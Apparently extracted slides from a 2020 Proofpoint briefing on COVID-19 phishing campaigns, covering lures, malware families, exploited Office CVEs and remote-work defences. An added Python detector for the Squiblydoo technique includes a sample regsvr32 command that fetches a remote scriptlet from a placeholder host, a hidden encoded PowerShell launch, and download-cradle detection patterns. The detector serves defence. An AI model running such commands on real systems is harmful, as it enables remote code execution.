Phishing During a Pandemic: Actors, Campaigns & Threats Leveraging COVID-19 Lures 20 May 2020

Phishing During a Pandemic: Actors, Campaigns & Threats ... · 02/06/2020  · All Global Campaign Brand Abuse All COVID-Themed Global Campaign Brand Abuse Global vs COVID Brand Abuse


Page 1

Phishing During a Pandemic: Actors, Campaigns & Threats Leveraging COVID-19 Lures
20 May 2020

Page 2

© 2019 Proofpoint. All rights reserved

Global Campaigns By Campaign Family

Page 3

Global COVID-Themed Campaigns By Campaign Family

Page 4

Global vs COVID Brand Abuse Trends (chart series: All Global Campaign Brand Abuse; All COVID-Themed Global Campaign Brand Abuse)

Page 5

ACTORS and LURES (diagram labels recovered from the slide): Silent Librarian; Modest; Veers; Covid-19 Map; Covid-19 Fake Bill; Covid WHO Lure

Page 6

Page 7

Page 8

Key Changes to Secure Posture for Remote Work

• High risk home network
• Traditional VPN could allow lateral movement
• Going straight to cloud apps from home office
• Traditional visibility limited
• Possibly personal device with uncertain security posture
• Targeted by phishing and BEC (likely leveraging COVID-19 lures)
• Low level of awareness for secure remote working
• No longer on corporate network
• Higher risk for downloaders pulling down secondary payloads

Page 9

Protecting transitions to remote work
People-Centric Secure Remote Access

Insider Threat Management for increased visibility into what remote workers do with sensitive data

ZTNA for rapid, zero trust implementation of secure remote access to on prem systems and data without any hardware

Email protection for protection from threats, awareness training for secure remote work practices

Isolation to provide secure web browsing and BYOD access to SaaS applications

CASB for visibility, RBA, threat protection, and DLP across cloud apps

Page 10

Covid-19 Threats

Relentless focus on credential phish

Legitimate filesharing abuse

More complex multi-stage threats

More BEC variants

Sophisticated attacks on Office 365 and G Suite accounts

Page 11

Domains with Most Threats Detected: office[.]com, docs[.]google[.]com, windows[.]net, sharepoint[.]com

Page 12

CVE-2017-8570 + OLE

Squiblydoo (regsvr32.exe)

Lemon Tree (PoSH)

Page 13

Page 14

Malicious Third-Party Apps

Page 15

COVID-19 By the Numbers

Page 16

COVID-19 Volume

75 Million malicious messages (April 18-22)

330+ Campaigns Tracked

Page 17

Campaign themes

Actors are motivated and integrating different themes spanning global to personal.

Diagram labels recovered from the slide:
Axes: Primary Motivations; Secondary Motivations; Delivery; Themes
Scales: Intrinsic / Mixed / Extrinsic; Tactical / Operational / Strategic; Widespread / Mixed / Focused; Local / Regional / Global / Personal
Theme examples: Survival kits, Medical Supplies, cases near me; Shipping, manufacturing; Retail, Banking; Tax reduction; Transnational… anti-bacteria credit card; BEC; Markets, World Health Organization
Regions: Netherlands; China, Italy, Netherlands, Germany, United States, Japan, Australia

Page 18

Tactics Leveraging Coronavirus
Across the Threats

Malware Payloads
• Emotet
• AZORult Stealer
• AgentTesla Keylogger
• GuLoader / NanoCore RAT
• Microsoft Office Phish
• HawkEye Keylogger
• Betabot
• Ave Maria / GuLoader / Remcos
• Ave Maria / Remcos / LimeRAT
• LimeRAT
• Ostap / The Trick

Diagram labels: MALICIOUS ATTACHMENT; MALICIOUS URL; CREDENTIAL PHISHING; BEC AND EMAIL FRAUD; FILE NAMES; DOMAIN NAMES

Page 19

Threat Focus: Examples from the Landscape

Page 20

Remcos RAT – COVID-19

Threat Overview
• Summary: Campaign distributing Remcos RAT/downloader with 2 lures (one COVID-19, one harassment)
• Subject: Sexual harassment report / package notification
• Tactics and Tools: .iso image file
• Malware: Remcos RAT
• Volume: Widespread distribution

Page 21

Family and Medical Leave Act

Threat Overview
• Summary: Campaign spoofing US Department of Labor
• Lure: FMLA adjustments
• Technique: IcedID (modular malware)
• Volume: broadly targeted

Page 22

Agent Tesla port vessel (1/2)

Threat Overview
• Summary: Message purporting to be from the World Health Organization, with WHO seal
• Subject: “COVID-19 HIGH RISK VSL / URGENT”
• Tactics and Tools: Microsoft Office attachments that use exploits (Equation Editor, CVE-2017-11882, CVE-2017-8570, macros) to download Agent Tesla
• Volumes: ~4000 messages; 372 organizations; 44% Transportation; 15% Energy

Page 23

Agent Tesla port vessel (2/2)

Page 24

The Truth of COVID-19 (1/1)

Threat Overview
• Summary: Campaign leveraging Word documents and the Squiblydoo technique to launch a PowerShell script
• Subject: The Truth of COVID-19 ????????????
• Tactics and Tools: Word (RTF) documents used Squiblydoo to launch a PowerShell script, followed by downloads of Mimikatz and the remote desktop utility FreeRDP
• Malware: Mimikatz via PowerShell script, then download of the remote desktop utility FreeRDP
• Targeting: 80 PFPT customers across 36 verticals
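As an added detection example (not from the Proofpoint deck), the Python below flags the Squiblydoo step described above in process-creation telemetry and correlates it with an Office parent and a PowerShell child that downloads. The event fields, process IDs, URL and command lines in the sample are constructed assumptions, not indicators from the campaign.

```python
# Flag the Squiblydoo step (regsvr32 loading a remote scriptlet via scrobj.dll)
# in process-creation events, then correlate it with an Office parent and a
# PowerShell child that downloads. Event shape and sample values are constructed.
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str    # executable file name, lower-cased (assumed field)
    cmdline: str

# regsvr32 /i: pointing at an http(s) URL plus scrobj.dll = remote scriptlet load
SQUIBLYDOO = re.compile(r'/i:\s*"?https?://', re.I)
SCROBJ = re.compile(r"scrobj\.dll", re.I)
# PowerShell download-cradle cues; a small, high-signal list (assumption)
PS_DOWNLOAD = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|-enc(odedcommand)?\b",
    re.I)
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}

def find_chains(events):
    """One alert per Squiblydoo-matching regsvr32 event, annotated with whether
    its parent is an Office process and whether a PowerShell child downloads."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        if e.image != "regsvr32.exe":
            continue
        if not (SQUIBLYDOO.search(e.cmdline) and SCROBJ.search(e.cmdline)):
            continue                      # plain COM registration: not Squiblydoo
        parent = by_pid.get(e.ppid)
        kids = [c for c in events if c.ppid == e.pid and c.image == "powershell.exe"]
        alerts.append({
            "pid": e.pid,
            "office_parent": parent is not None and parent.image in OFFICE,
            "powershell_download": any(PS_DOWNLOAD.search(c.cmdline) for c in kids),
        })
    return alerts

# Constructed sample telemetry; URL and PIDs are placeholders, not campaign IoCs
SAMPLE = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "winword.exe", '"WINWORD.EXE" /n "C:\\Users\\u\\Downloads\\truth.rtf"'),
    ProcEvent(300, 200, "regsvr32.exe", "regsvr32 /s /n /u /i:http://example.invalid/s.sct scrobj.dll"),
    ProcEvent(400, 300, "powershell.exe", "powershell -nop -w hidden -enc CONSTRUCTED_B64"),
    ProcEvent(500, 100, "regsvr32.exe", 'regsvr32 /s "C:\\Program Files\\Vendor\\vendor.dll"'),
]
```

Running `find_chains(SAMPLE)` yields a single alert for the regsvr32 event with both correlation flags set; the benign local DLL registration is not flagged.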

Page 25

Emerging Trends

• Spoofed offers of relief from financial institutions
• Primarily steals credit card details, direct deposit details, and other forms of financial data
• Most prevalent in the United States; also present in Europe, Australia, and Africa

Page 26

Proofpoint and COVID-19
Summary, our position, updates, questions

Page 27

Diagram labels recovered from the slide:
Pillars: PEOPLE-CENTRIC PROTECTION; DATA AND ACCESS CONTROLS; AWARENESS AND TRAINING
Channels: Cloud Accounts; Internal Email; Personal Webmail; Endpoint Activity; Web and Unsanctioned App Access; Sanctioned Access; Identity Deception
Products: Advanced Email Security; Targeted Attack Protection (TAP); Threat Response Auto-Pull (TRAP); Internal Mail Defense; Cloud Account Defense; Email Isolation; Email DLP; Email Encryption; CASB DLP; Browser Isolation; Zero Trust Access; Email Fraud Defense; Insider Threat Management; Cloud App Governance and Data Protection; Information Protection
Taglines: Protect people from the threats that target them. Enable users to protect themselves and your organization. Protect the data people create and access from security and compliance risk.

Page 28

Response and Resources

Response
• Detection for commodity remains strong
• TAP Campaigns being tracked as “COVID-19”
• Set of COVID-19 hunting and detection IDS sigs available open source in ET Open
  – http://rules.emergingthreatspro.com/open/
• Free Meta VPN solution through September 2020

Continuing Updates
• Proofpoint blog updates
  – https://www.proofpoint.com/us/blog

@threatinsight

Page 29

Other Resources (All Free)

• Proofpoint Meta available to all Proofpoint customers at no charge for zero trust network access

• Security Awareness Training attack spotlight: Covid-19 lures

• Remote worker-tailored training modules

• Partner offer: MFA and SSO from Okta: https://www.okta.com/okta-for-emergency-remote-work/
